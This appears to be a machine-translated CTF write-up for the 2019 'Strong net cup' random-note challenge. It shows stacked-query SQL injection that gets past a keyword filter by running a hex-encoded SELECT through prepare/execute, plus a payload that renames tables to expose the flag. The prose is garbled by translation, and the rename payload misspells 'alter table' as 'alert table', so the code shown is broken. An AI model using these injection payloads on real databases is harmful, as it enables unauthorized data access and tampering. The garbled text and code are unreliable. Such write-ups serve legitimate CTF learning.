Strong net cup 2019 random note

First try to inject directly , It seems useless to find

Try to use union Blind note ,preg_match() The function can search and match a string according to a regular expression , Found it all banned , So exclude union Inject

Use show, It is found that the table name can be viewed

Use desc Command to view the details of the two table structures respectively , here 1919810931114514 This table name must use Cover up .


Because I found that there are many functions filtered here , So consider how to bypass .
The preprocessing statement is used here . The first select * from ` 1919810931114514 `, adopt 16 The hexadecimal code becomes a string of numbers

And then use prepare from Precompiled function , This function will automatically put 16 Base string converted to SQL sentence , Through execute Perform precompiled SQL sentence .0';SET @a=0x73656C656374202A2066726F6D20603139313938313039333131313435313460;prepare m_string from @a;execute m_string;#

There are other ways to look online , For example, modify the table name and column name .

The first words Change to another table name , And then 1919810931114514 Renamed as words, Give new words Add new column name id, And then flag Renamed as data.

1';
 rename table words to word1; 
 rename table  `1919810931114514` to words;// Change the name of the watch 
 alert table words add id int unsigned not Null auto_increment primary key ;// Add a self increasing ID
 alert table words change flag data varchar(100); # // Name change